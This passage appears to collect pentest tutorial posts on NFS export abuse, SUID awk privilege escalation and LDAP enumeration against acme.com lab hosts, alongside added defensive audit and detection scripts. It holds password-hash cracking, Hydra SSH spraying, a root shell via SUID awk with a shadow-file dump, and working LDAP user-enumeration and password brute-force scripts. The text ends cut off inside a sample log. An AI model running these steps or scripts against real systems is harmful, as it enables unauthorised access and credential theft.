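On a real host the same function runs as `detect_login_bursts vsftpd 20 /var/log/vsftpd.log` or `detect_login_bursts apache 20 /var/log/apache2/access.log`. The counts are over the whole file, so for an alerting rule you would feed it a time window (for example the last hour via `grep` on the timestamp) rather than the full history; a single client that fails hundreds of times and then succeeds, as in the vsftpd sample, is the pattern worth paging on.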

Tuesday, September 3, 2019

Attacking NFS

This is our data set we will work from which was gathered during the OSINT phase from the company website: http://www.acme.com

k.madden@mail.acme.com
t.stephens@mail.acme.com
k.parsons@mail.acme.com
d.hansen@mail.acme.com
k.ball@mail.acme.com
c.harvey@mail.acme.com
j.macdonald@mail.acme.com
c.gibbs@mail.acme.com
j.mcpherson@mail.acme.com
g.joyner@mail.acme.com
c.casey@mail.acme.com
c.eaton@mail.acme.com
c.rojas@mail.acme.com

With this list of email addresses and possible user names we will attempt to gain shell access to the remote host through NFS enumeration and exploitation.

First let's do a quick service scan on our suspected NFS server.

root@asus:~/pentest_notes% nmap -sV -T4 -p111,2049 nemo.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 04:21 MST
Nmap scan report for nemo.acme.com
Host is up (0.0024s latency).
PORT     STATE SERVICE VERSION
111/tcp  open  rpcbind 2 (RPC #100000)
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 08:00:27:30:FA:3B (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.97 seconds
root@asus:~/pentest_notes% 

Query rpcbind for information about what services are currently running on the remote host.

sam@asus:~/pentest_notes% rpcinfo -p nemo.acme.com
   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp    839  mountd
    100005    3   udp    839  mountd
    100005    1   tcp    673  mountd
    100005    3   tcp    673  mountd
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
sam@asus:~/pentest_notes% 

We can verify that the NFS service is actually running by querying a specific port and program number.

sam@asus:~/pentest_notes% rpcinfo -n 2049 -t nemo.acme.com 100003
program 100003 version 2 ready and waiting
program 100003 version 3 ready and waiting
sam@asus:~/pentest_notes% 

Now we can query the NFS server and ask to see the list of mountable drives.

root@asus:~/pentest_notes% showmount -e nemo.acme.com
Export list for nemo.acme.com:
/export/backups (everyone)
root@asus:~/pentest_notes%

We see that /export/backups is accessible to everyone, so we will try to mount that directory locally. First we need to create a local mount point, which we will call `/mnt/loot`.

root@asus:~/pentest_notes% mkdir /mnt/loot
root@asus:~/pentest_notes%

After we create the local mount point we can try and mount the remote directory.

root@asus:~/pentest_notes% mount nemo.acme.com:/export/backups /mnt/loot
root@asus:~/pentest_notes%

If no errors occur then we are good. Now let's see what we got by cd'ing into our local mount point `/mnt/loot`.

root@asus:~/pentest_notes% cd /mnt/loot;ls -la
total 12
drwxrwxrwx 2 root root  512 Dec 27 20:44 .
drwxr-xr-x 4 root root 4096 Dec 28 03:53 ..
-rwxrwxrwx 1 root root 5604 Dec 27 20:44 master.passwd.old
root@asus:/mnt/loot% 
root@asus:/mnt/loot% cat master.passwd.old | less
root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/operator:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21::0:0:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28::0:0:portmap:/var/empty:/sbin/nologin
_identd:*:29:29::0:0:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30::0:0:rpc.rstatd:/var/empty:/sbin/nologin
...
root@asus:/mnt/loot%

We got what looks like a backup of the master.passwd (BSD) file of the NFS server which we will use next to try and gain shell access.

root@asus:/mnt/loot% cat master.passwd.old | awk 'BEGIN{FS=":"} {if ($3 > 1000 || $3 == 0) print $1 ":" $2}'
root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG
k.madden:$2b$09$d6VfZmp2SbBV1HVo2OYC4ebZeoNspr3XoMVOaCGTaiXaWGng45.3u
t.stephens:$2b$09$daF97oYu6wAi3c0gHkKgPuKn0HAeu8yf8u1b3aBRmxEFXyJHyCpHG
k.parsons:$2b$09$/goSifrmIrT/sds5UHdPwOyQrO9RcoogBUW.r6JviwMi4s.osmp6G
d.hansen:$2b$09$4Z5FxDk1gmLk9/utv8B78OOsEK/fONTPD2kSzFzgGbcXS6t.fxKga
k.ball:$2b$09$Oy1xHnN5akCb3T04X2mdGes.9TRm6uL4eCz7N7HVBFj2FV83aoSxe
c.harvey:$2b$09$a.FBS1/idqVpL1c1W4BtkuZrLiliBrk9FiYsJ834TJQMLosnLWzde
j.macdonald:$2b$09$tNp6xHtL5F1fTCx7cugGh.iqeFwBU5QkXTSDyzHerOLxYwwI0XplC
c.gibbs:$2b$09$J21XaR8.IOy30OXzSU61Kefyg6w24GN5i9nshfQkjOAsJqYHFRDRq
j.mcpherson:$2b$09$2V.h6JWa/I.zY1g0oc/K3uhnYugP0kMUXGCBTzSngi1Km2XKGM3TO
g.joyner:$2b$09$LPPpcASJvm57u7ethcJ9Zezo0btiowPieLNaP2VneMmVZUpu/Us0u
c.casey:$2b$09$tkrV9v9ZOoX/lABPhbBTeOXtHX/hogOXqK47KE6N.DQKKlimDw8LO
c.eaton:$2b$09$1ftTp/OAcRGb5GWlTqeA8.j4naL0dwlIUh.RsQNez1yEOQjDMr/Cq
c.rojas:$2b$09$MMs5cVaZrAlXmT/enxCbSOwzdi3I.PUGaN83wXw5/XHwYRR6oOYY.
root@asus:/mnt/loot%

All these entries will be used in a dictionary attack against the master.passwd file using JTR (John The Ripper).

root@asus:~/src/john/run% ./john --format=bcrypt --wordlist=/home/sam/pentest_notes/ry.txt ~/pentest_notes/master.passwd.openbsd 
Using default input encoding: UTF-8
Loaded 13 password hashes with 13 different salts (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 512 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
naruto           (k.ball)
summer           (c.harvey)
whatever         (k.madden)
spongebob        (c.gibbs)
junior           (g.joyner)
yellow           (c.rojas)
taylor           (c.eaton)
cookie           (d.hansen)
sweety           (j.macdonald)
joseph           (j.mcpherson)
dragon           (t.stephens)
softball         (c.casey)
12g 0:00:00:03 DONE (2018-12-28 13:44) 3.508g/s 3.801p/s 49.41c/s 49.41C/s whatever..yellow
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@asus:~/src/john/run% 

After recovering what usernames and passwords we could, we can now test which logins are still valid by running the Hydra tool against SSH.

root@asus:~/pentest_notes% hydra -L nemo.acme.com-userlist.txt -P nemo.acme.com-passlist.txt nemo.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-28 13:56:23
[DATA] max 16 tasks per 1 server, overall 64 tasks, 52 login tries (l:13/p:4), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: nemo.acme.com   login: k.madden   password: whatever
[22][ssh] host: nemo.acme.com   login: t.stephens   password: dragon
[22][ssh] host: nemo.acme.com   login: c.casey   password: softball
[22][ssh] host: nemo.acme.com   login: c.rojas   password: yellow
1 of 1 target successfully completed, 4 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-26 22:55:50
root@asus:~/pentest_notes% 

So out of the 13 users we found, 4 of them still use the same password for their login. Now we can verify if each login works.

sam@asus:~/pentest_notes% ssh -l k.madden nemo.acme.com
The authenticity of host 'nemo.acme.com (192.168.0.133)' can't be established.
ECDSA key fingerprint is SHA256:JdXLz4mKxMOL/l6tGK/5ETiDUAWVVX0HCmDiuQyuxig.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'nemo.acme.com' (ECDSA) to the list of known hosts.
k.madden@nemo.acme.com's password: 
OpenBSD 6.4 (GENERIC) #926: Thu Oct 11 13:43:06 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

nemo$ hostname
nemo.acme.com
nemo$ id
uid=1001(k.madden) gid=1001(k.madden) groups=1001(k.madden), 0(wheel)
nemo$ su t.stephens
Password:
nemo$ id
uid=1002(t.stephens) gid=1002(t.stephens) groups=1002(t.stephens), 0(wheel)
nemo$ su c.casey
Password:
nemo$ id
uid=1011(c.casey) gid=1011(c.casey) groups=1011(c.casey), 0(wheel)
nemo$ su c.rojas
Password:
nemo$ id
uid=1013(c.rojas) gid=1013(c.rojas) groups=1013(c.rojas), 0(wheel)
nemo$ exit
nemo$ exit
nemo$ exit
nemo$ exit
Connection to nemo.acme.com closed.
sam@asus:~/pentest_notes% 

As you can see all of the users are in the `wheel` group, meaning they can su to root if they know the root password.
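
The `(everyone)` in the showmount output above comes straight from /etc/exports on the server. As an added example (mine, not part of the original post), here is a small audit of an exports file that flags the usual mistakes: no client list at all, a `*` client, `rw`, `no_root_squash`, `insecure`, and the classic typo of a space before the option list, which silently applies those options to every host. The two exports files are constructed.

```sh
#!/bin/sh
# Added example: audit /etc/exports for world-accessible or root-trusting
# exports. Not part of the original post; sample files are constructed.

# audit_exports [FILE]   (reads stdin when no FILE is given)
# Prints one finding per line. Exit status: 0 = nothing risky, 1 = findings.
audit_exports() {
    awk '
        { sub(/#.*/, ""); if ($0 ~ /^[ \t]*$/) next }   # drop comments and blank lines
        {
            path = $1
            if (NF == 1) {                               # no client list: every host, read-only
                print "RISK: " path " is exported to every host (no client list)"; bad = 1; next
            }
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                p = index($i, "(")                       # "client(opt,opt)"
                if (p > 0) {
                    client = substr($i, 1, p - 1); opts = substr($i, p + 1); sub(/\)$/, "", opts)
                }
                if (client == "") {                      # "client (opts)": the space detaches the options
                    print "RISK: " path " has options (" opts ") separated from the client by a space, so they apply to every host"
                    bad = 1; continue
                }
                if (client == "*") { print "RISK: " path " is exported to every host (*)"; bad = 1 }
                if (opts ~ /(^|,)rw(,|$)/) { print "WARN: " path " is writable for " client; bad = 1 }
                if (opts ~ /no_root_squash/) { print "RISK: " path " lets root on " client " act as root (no_root_squash)"; bad = 1 }
                if (opts ~ /(^|,)insecure(,|$)/) { print "WARN: " path " accepts client ports above 1024 for " client " (insecure)"; bad = 1 }
            }
        }
        END { exit (bad ? 1 : 0) }
    ' "$@"
}

# constructed sample: the export seen above, plus the space-before-options typo
WEAK_EXPORTS=$(cat <<'EOF'
/export/backups *(rw,no_root_squash)
/srv/share 148.32.42.0/24 (rw)
EOF
)

# constructed sample: one host, read-only, root mapped to nobody
HARDENED_EXPORTS=$(cat <<'EOF'
/export/backups 148.32.42.10(ro,root_squash,sync)
EOF
)

echo "== weak exports =="
printf '%s\n' "$WEAK_EXPORTS" | audit_exports || echo "=> review /etc/exports"
echo "== hardened exports =="
printf '%s\n' "$HARDENED_EXPORTS" | audit_exports && echo "=> no findings"
```

Run it as `audit_exports /etc/exports` on the NFS server, and keep in mind that an export list only limits who can mount; the file permissions inside the export (the `-rwxrwxrwx` on master.passwd.old above) are a separate problem that this check does not see.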

Monday, September 2, 2019

Suid binary exploitation

SUID binary exploitation involves a binary with its SUID bit set, so that anything executed by the program runs with the privileges of the file's owner. First we search for SUID binaries in the root of the filesystem.

sam@asus:~% find / -user root -perm -4000 -exec ls -ldb {} \;
-r-sr-xr-x 1 root bin 38836 Aug 10 16:16 /usr/bin/at
-rwsr-xr-x 1 root root 11288 Nov 19 11:29 /usr/bin/awk
-r-sr-xr-x 1 root bin 19812 Aug 10 16:16 /usr/bin/crontab
---s--x--x 1 root sys 46040 Aug 10 15:18 /usr/bin/ct
-r-sr-xr-x 1 root sys 12092 Aug 11 01:29 /usr/lib/mv_dir
-r-sr-sr-x 1 root bin 33208 Aug 10 15:55 /usr/lib/lpadmin
-r-sr-sr-x 1 root bin 38696 Aug 10 15:55 /usr/lib/lpsched
---s--x--- 1 root rar 45376 Aug 18 15:11 /usr/rar/bin/sh
-r-sr-xr-x 1 root bin 12524 Aug 11 01:27 /usr/bin/df
-rwsr-xr-x 1 root sys 21780 Aug 11 01:27 /usr/bin/newgrp
-r-sr-sr-x 1 root sys 23000 Aug 11 01:27 /usr/bin/passwd
-r-sr-xr-x 1 root sys 23824 Aug 11 01:27 /usr/bin/su
...
sam@asus:~%

We can see the AWK program has `-rwsr` instead of `-rwxr`, signifying the SUID bit is set on the AWK binary. We also see that it is root:root, meaning any instruction we pass to AWK will be run with root privileges.

sam@asus:~% ls -la /usr/bin/awk
-rwsr-xr-x 1 root root 1911288 Nov 19 11:29 /usr/bin/awk
sam@asus:~% 

Next we can use the AWK program to try and spawn a simple shell with the awk system() function call. First we check our current uid/gid.

sam@asus:~% id
uid=1000(sam) gid=1000(sam) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
sam@asus:~%

Lets issue our shell command and check our uid/gid stats afterward.

sam@asus:~% awk 'BEGIN{system("/bin/sh")}'
# id
uid=1000(sam) gid=1000(sam) euid=0(root) groups=1000(sam),4(adm),24(cdrom),27(sudo),46(plugdev),112(lpadmin)
# 

And of course we raid the /etc/shadow file for password hashes.

# cut -d: -f1,2 /etc/shadow
...
root:$6$uGqhP09J$cDygxAzkw0gMFeTJsyhTfyYsqY2JPkx6wyJ3gJ6Xgr5aIMUeUZ0gjnaw.GPRQSTuV5ep1gBdcjnlC85GzirU9.
sam:$6$m0baQXyk$o3gxkMH4aI1M5IGJWWI.SBcrpKhcutuPt98O3UtQ8wljLuGmTsX5YKzaDsJSX65g14hf76kVLNZVvPPzVJRV4/
evelyn:$6$mJ3sgN0Q$ex3hiPuSebIvKbVLFFbDvUy.CrZowiSf1g/HAR78hLI8pFMG.WO9wma9dnA45MrIDYpdXtMV2CXK8EXAo6ix61
price:$6$G7zo0DN0$Ob9ro9/fMXYNja40VsbcPCh6AHg9UDGg01Lv33H1eRw.QiB8/kQ0WVbs8yz59w38BwHsJpRCbvN1tquj9exlT.
ralph:$6$GGNFUI3s$bBf5FuCP6cbe2f881sLi2kO1woWqM58wzLGSy72mtLTs4KI/ok7CA4rtHNFXUpd7FHYWfnpQyN0tUCvvqK5qm0
lester:$6$l1ULRsYG$b0eBdMJx8eniZ0UMYlYVyC5O8aUDDg5NWMumLEqO8yowvEbKS/uIhDKjjbEXJ3vvokvhrDs47BSbWpr151tld0
wylie:$6$ao/opbGp$atg67ybDl2hObBB06AcnvJpNggaxMNJ7ubsb8mXPo67qg29uZZ3oCaloiuVrhoHrbNgN0PkSINOF7OnnEr6Ac.
callum:$6$b19tmwgI$NB7lXM8FwzMiV0zQOT5fOpMhmSN6Q6fHswtEHBum66/Wt9IwGR.WHbcL5vzEuCVx8woHv1w/eOF7/PxjKtHWQ.
mannix:$6$2RPPrMar$DDV.sfg7/CZyV2NHsoXa2oIDI/kn3ZK4aHpIcUR59JwPsl1/JeSokDFWRvpiZymgFg1zqh2ZY919Z5D3BDlBs.
# exit
sam@asus:~% 

Since the AWK binary has its SUID bit set and is owned by root (`euid=0(root)`), the AWK program will execute any instructions as root. This is one of many tools you can use to escalate privileges on a UNIX box if the SUID bit is set.
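
The two SUID lists above (the one that exposed cp in the FTP post and the one that exposed awk here) are only alarming if you know which SUID files a host is supposed to have. Here is an added example, my own rather than code from either post, that diffs a found list against an allow-list with sort and comm, so that extras such as cp, awk, perl or a stray binary in a home directory stand out. The found list is a subset of the find output in the two posts; the allow-list is a constructed sample, not any distribution's official set.

```sh
#!/bin/sh
# Added example: flag SUID files that are not on an allow-list. Not part of the
# original posts; the allow-list is a constructed sample.

# audit_suid FOUND_FILE BASELINE_FILE
# Prints every SUID path in FOUND_FILE that is absent from BASELINE_FILE.
# Exit status: 0 = nothing unexpected, 1 = unexpected SUID files present.
audit_suid() {
    a=$(mktemp) || return 2
    b=$(mktemp) || return 2
    # comm needs both inputs sorted the same way, so fix the collation
    LC_ALL=C sort -u "$1" > "$a"
    LC_ALL=C sort -u "$2" > "$b"
    unexpected=$(LC_ALL=C comm -23 "$a" "$b")   # -23: lines only in the first file
    rm -f "$a" "$b"
    if [ -z "$unexpected" ]; then
        return 0
    fi
    printf '%s\n' "$unexpected"
    return 1
}

FOUND=$(mktemp); BASELINE=$(mktemp)
trap 'rm -f "$FOUND" "$BASELINE"' EXIT

# subset of the find output shown in the two posts above; on a live host use
#   find / -xdev -type f -perm -4000 2>/dev/null > found.txt
cat > "$FOUND" <<'EOF'
/usr/lib/openssh/ssh-keysign
/usr/bin/perl
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/gawk
/usr/bin/awk
/home/sam/unix/prog
/bin/su
/bin/ping
/bin/mount
/bin/cp
/bin/umount
EOF

# constructed allow-list: SUID files this host is expected to carry
cat > "$BASELINE" <<'EOF'
/bin/mount
/bin/ping
/bin/su
/bin/umount
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/usr/lib/openssh/ssh-keysign
EOF

echo "== SUID files not on the allow-list =="
if audit_suid "$FOUND" "$BASELINE"; then
    echo "=> none"
else
    echo "=> investigate the files above (chmod u-s if they do not need it)"
fi
```

The allow-list should be built from a freshly installed host of the same release, then kept under version control; anything that shows up in the diff afterwards is either a package update worth reading the changelog for or exactly the kind of change the two posts above exploit.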

Sunday, September 1, 2019

Testing LDAP servers with examples

Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up and running.

sam@asus:~% ping -c 3 148.32.42.5
PING 148.32.42.5 (148.32.42.5) 56(84) bytes of data.
64 bytes from 148.32.42.5: icmp_seq=1 ttl=64 time=0.043 ms
64 bytes from 148.32.42.5: icmp_seq=2 ttl=64 time=0.082 ms
64 bytes from 148.32.42.5: icmp_seq=3 ttl=64 time=0.122 ms

--- 148.32.42.5 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2087ms
rtt min/avg/max/mdev = 0.043/0.082/0.122/0.033 ms
sam@asus:~% 

We first start by scanning the host with nmap to verify if port 389 is indeed open.

sam@asus:~% sudo nmap -sV -p389 148.32.42.5

Starting Nmap 7.01 ( https://nmap.org ) at 2019-01-22 10:55 MST
Nmap scan report for ldap.acme.com (148.32.42.5)
Host is up (0.00014s latency).
PORT    STATE SERVICE VERSION
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
sam@asus:~% 

As we can see nmap reports back to us that port 389 is indeed open and running the LDAP service.

Anonymous Bind

Our next test is to see if this LDAP server is vulnerable to a NULL base or anonymous bind. We will search for all Distinguished Names (DN) in the tree.

sam@asus:~% ldapsearch -x -b "dc=acme,dc=com" "*" -h 148.32.42.5 | awk '/dn: / {print $2}'
dc=acme,dc=com
cn=admin,dc=acme,dc=com
cn=ldapusers,dc=acme,dc=com
cn=evelyn
cn=sales,dc=acme,dc=com
ou=direct,cn=sales,dc=acme,dc=com
ou=channel,cn=sales,dc=acme,dc=com
cn=support,dc=acme,dc=com
cn=training,dc=acme,dc=com
ou=helpdesk,cn=support,dc=acme,dc=com
ou=escalation,cn=support,dc=acme,dc=com
ou=instructors,cn=training,dc=acme,dc=com
ou=course
cn=chris
cn=sam
cn=justin
cn=heath
cn=nick
cn=eric
cn=tim
cn=vaj
sam@asus:~% 

In this case anonymous bind is allowed and we are able to traverse the directory tree as we would if we were an authenticated user. We can go further by pilfering through the directory to find all the users and user names on the server.

Unauthenticated Bind Enumeration (DN with no password)

Lets try a search for all user id's in the directory subtree using the DN `cn=admin,dc=acme,dc=com` and no password.

root@asus:~% ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5 | awk '/uid: /{print $2}' | nl
     1 esampson
     2 cchiu
     3 skumar
     4 jsmith
     5 hahmad
     6 nolsen
     7 ealvarez
     8 tmoreau
     9 vpatel
root@asus:~% 

This is what you will see if you come upon a server where unauthenticated binds are disallowed:

sam@asus:~% ldapsearch -x -D "cn=admin,dc=acme,dc=com" -s sub "cn=*" -h 148.32.42.5
ldap_bind: Server is unwilling to perform (53)
additional info: unauthenticated bind (DN with no password) disallowed
sam@asus:~% 

Unauthenticated Binds are only allowed if Anonymous Binds are also enabled.
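
The three bind behaviours seen above (anonymous bind allowed, unauthenticated bind disallowed, and the "unwilling to perform" refusal) are governed by a handful of global directives in OpenLDAP's cn=config. As an added example (my own, not from the original post), here is a check over an LDIF export of cn=config that unfolds LDIF continuation lines and then looks for `olcAllows: bind_anon_cred` (which turns unauthenticated binds on), the absence of `olcDisallows: bind_anon`, the absence of `olcRequires: authc`, and a missing `olcSecurity: ssf=...` minimum. Both LDIF samples are constructed.

```sh
#!/bin/sh
# Added example: audit an LDIF dump of OpenLDAP's cn=config for the bind
# settings the searches above depend on. Not part of the original post;
# sample LDIF is constructed.

# audit_slapd_config [FILE]   (reads stdin when no FILE is given)
# Prints one finding per line. Exit status: 0 = nothing risky, 1 = findings.
audit_slapd_config() {
    awk '
        function check(line) {
            if (line ~ /^olcAllows:.*bind_anon_cred/) {
                print "RISK: unauthenticated binds (DN with an empty password) are allowed (olcAllows: bind_anon_cred)"; bad = 1
            }
            if (line ~ /^olcDisallows:.*bind_anon/) anon_off = 1
            if (line ~ /^olcRequires:.*authc/)     authc = 1
            if (line ~ /^olcSecurity:.*ssf=/)      ssf = 1
        }
        /^ / { buf = buf substr($0, 2); next }     # LDIF folds long values onto lines starting with a space
        { if (buf != "") check(buf); buf = $0 }
        END {
            if (buf != "") check(buf)
            if (!anon_off) { print "RISK: anonymous binds are not disallowed (olcDisallows: bind_anon)"; bad = 1 }
            if (!authc)    { print "WARN: authentication is not required for operations (olcRequires: authc)"; bad = 1 }
            if (!ssf)      { print "WARN: no minimum security strength factor set (olcSecurity: ssf=...)"; bad = 1 }
            exit (bad ? 1 : 0)
        }
    ' "$@"
}

# constructed sample: anonymous and unauthenticated binds both work
WEAK_SLAPD=$(cat <<'EOF'
dn: cn=config
objectClass: olcGlobal
cn: config
olcAllows: bind_anon_cred
EOF
)

# constructed sample: anonymous binds refused, authentication and encryption required
# (olcRequires is folded over two lines to exercise the unfolding)
HARDENED_SLAPD=$(cat <<'EOF'
dn: cn=config
objectClass: olcGlobal
cn: config
olcDisallows: bind_anon
olcRequires: aut
 hc
olcSecurity: ssf=128
EOF
)

echo "== weak cn=config =="
printf '%s\n' "$WEAK_SLAPD" | audit_slapd_config || echo "=> tighten slapd bind policy"
echo "== hardened cn=config =="
printf '%s\n' "$HARDENED_SLAPD" | audit_slapd_config && echo "=> no findings"
```

On the server the input comes from `slapcat -n 0` (or `ldapsearch -Y EXTERNAL -H ldapi:/// -b cn=config`) piped into `audit_slapd_config`. The global directives are only half the story: what an anonymous or authenticated client may read is decided by the database's `olcAccess` rules, which this check does not evaluate.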

Authenticated Bind Enumeration

For an authenticated LDAP bind we need to crack some passwords, preferably the LDAP administrator's. We also need to identify the authentication mechanism in use, such as DIGEST-MD5.

We can get the authentication mechanism by using a bogus password and trying to log in.

sam@asus:~% ldapwhoami -h ldap.acme.com -w "abcd123"
SASL/DIGEST-MD5 authentication started
ldap_sasl_interactive_bind_s: Invalid credentials (49)
 additional info: SASL(-13): user not found: no secret in database
sam@asus:~%

Dictionary attack to find valid users

We can use Perl and the Net::LDAP module to check for valid users on the remote LDAP server. The simple script below searches for valid users and returns a distinguished name if found. This will help us in our next step, which is to guess passwords for the accounts we find in this search. You can get some ideas on username guessing from Enumerating UNIX usernames.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::LDAP;
use Net::LDAP::Util qw(escape_filter_value);

my $server   = "ldap.acme.com";
my $base     = "dc=acme,dc=com";
my $filename = "users.txt";

open(my $fh, '<', $filename) or die $!;

my $ldap = Net::LDAP->new($server) or die $@;

# anonymous bind; the searches below only work where the server allows it
my $bind = $ldap->bind;
die "bind failed: " . $bind->error if $bind->code;

while (my $word = <$fh>) {
    chomp($word);
    next if $word eq '';

    my $search = $ldap->search(
        base    => $base,
        scope   => 'sub',
        # escape the word so characters such as * or ( cannot alter the filter
        filter  => '(uid=' . escape_filter_value($word) . ')',
        attrs   => ['dn']
    );

    # a search error (size limit, access denied, ...) is not the same as "not found"
    die "search failed: " . $search->error if $search->code;

    print "[+] Found valid login name $word\n" if(defined($search->entry));
}

close($fh);
$ldap->unbind;

We now run the script and fuzz for users on the server.

sam@asus:~/public_html% ./ldap-users.pl 
[+] Found valid login name twest
[+] Found valid login name vpatel
[+] Found valid login name hahmad
[+] Found valid login name ealvarez
[+] Found valid login name skumar
[+] Found valid login name tmoreau
[+] Found valid login name jsmith
sam@asus:~/public_html% 

Dictionary attack to find valid password

Once we have a valid list of users on the server, we can move forward to search for valid user and password combinations. We can use Perl and Net::LDAP to query the server and test for valid logins.

#!/usr/bin/env perl
use strict;
use warnings;
use Net::LDAP;
use Net::LDAP::Util qw(escape_filter_value);

my $server   = "ldap.acme.com";
my $user     = "twest";
my $base     = "dc=acme,dc=com";
my $filename = "wordlist.txt";

open(my $fh, '<', $filename) or die $!;

my $ldap = Net::LDAP->new($server) or die $@;

# resolve the uid to its DN with an (anonymous) search
my $search = $ldap->search(
    base    => $base,
    scope   => 'sub',
    filter  => '(uid=' . escape_filter_value($user) . ')',
    attrs   => ['dn']
);
die "search failed: " . $search->error if $search->code;

if(defined($search->entry)) {

    my $user_dn = $search->entry->dn;

    print "[*] Searching for valid LDAP login for $user_dn...\n";

    while (my $word = <$fh>) {
        chomp($word);
        # an empty password is an unauthenticated bind; on servers that allow
        # it the bind succeeds without proving anything about the password
        next if $word eq '';

        my $mesg = $ldap->bind($user_dn, password => $word);

        if ($mesg and $mesg->code() == 0) {
            print "[+] Found valid login $user_dn / $word\n";
            $ldap->unbind;
            exit;
        }
    }
} else {
    print "[x] $user is not a valid LDAP user...\n";
    exit;
}

print "[x] No valid LDAP logins found...\n";
$ldap->unbind;

Running the script against the server we get the following:

sam@asus:~/public_html% ./ldap-passwords.pl 
[*] Searching for valid LDAP login for cn=tim west,ou=channel,cn=sales,dc=acme,dc=com...
[+] Found valid login cn=tim west,ou=channel,cn=sales,dc=acme,dc=com / password
sam@asus:~/public_html% 

Using ldapwhoami to gain access

Here is a script to test a list of passwords against a valid Distinguished Name (DN) on a remote host.

#!/usr/bin/env bash
##
## Dictionary password attack against a valid DN using ldapwhoami
##

dn="cn=admin,dc=acme,dc=com"
host="ldap.acme.com"
list="wordlist.txt"

# Read the wordlist one line at a time so passwords containing spaces stay intact;
# the || [ -n "$word" ] clause keeps a final line without a trailing newline
while IFS= read -r word || [ -n "$word" ]
do
    [ -z "$word" ] && continue

    # ldapwhoami exits 0 only when the simple bind as $dn succeeds
    if ldapwhoami -h "${host}" -D "${dn}" -w "${word}" 2>/dev/null
    then
        echo "Password \`${word}\` found for user"
    fi
done < "${list}"

If we run the shell script we should see this on success:

root@asus:~/pentest_notes% ./ldapwhoami-dictonary.sh 
dn:cn=admin,dc=acme,dc=com
Password `ldapadmin` found for user
root@asus:~/pentest_notes% 
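All three procedures above leave a distinctive trail in OpenLDAP's stats log (loglevel 256): the user enumeration shows up as a burst of SRCH lines with uid filters on a connection that never bound, and both password scripts show up as BIND lines whose RESULT carries err=49 from the same client IP, either many on one connection (Net::LDAP) or one per connection (ldapwhoami). The following Python is an added detection example, not part of these notes: it ties each connection to its client address via the ACCEPT line, pairs every BIND with its RESULT, and raises an alert when one address accumulates repeated bind failures against a DN or an unauthenticated connection probes many distinct uid values. The log lines, addresses and thresholds are constructed for the example.

```python
"""Flag LDAP dictionary attacks in OpenLDAP 'stats' (loglevel 256) syslog lines.

Added detection example; the log lines, IPs and thresholds below are constructed.
"""
import re
from collections import defaultdict

# Constructed sample: conn=1001 probes uids anonymously, conn=1002 guesses the
# admin password until one bind returns err=0, conn=1003 is an ordinary login.
SAMPLE_LOG = """\
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 fd=12 ACCEPT from IP=192.0.2.55:51234 (IP=0.0.0.0:389)
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=0 SRCH base="dc=acme,dc=com" scope=2 deref=0 filter="(uid=twest)"
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=0 SEARCH RESULT tag=101 err=0 nentries=1 text=
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=1 SRCH base="dc=acme,dc=com" scope=2 deref=0 filter="(uid=bogus1)"
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=1 SEARCH RESULT tag=101 err=0 nentries=0 text=
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=2 SRCH base="dc=acme,dc=com" scope=2 deref=0 filter="(uid=bogus2)"
Jan 20 22:10:00 ldap slapd[1234]: conn=1001 op=2 SEARCH RESULT tag=101 err=0 nentries=0 text=
Jan 20 22:10:01 ldap slapd[1234]: conn=1001 fd=12 closed
Jan 20 22:10:02 ldap slapd[1234]: conn=1002 fd=12 ACCEPT from IP=192.0.2.55:51240 (IP=0.0.0.0:389)
Jan 20 22:10:02 ldap slapd[1234]: conn=1002 op=0 BIND dn="cn=admin,dc=acme,dc=com" method=128
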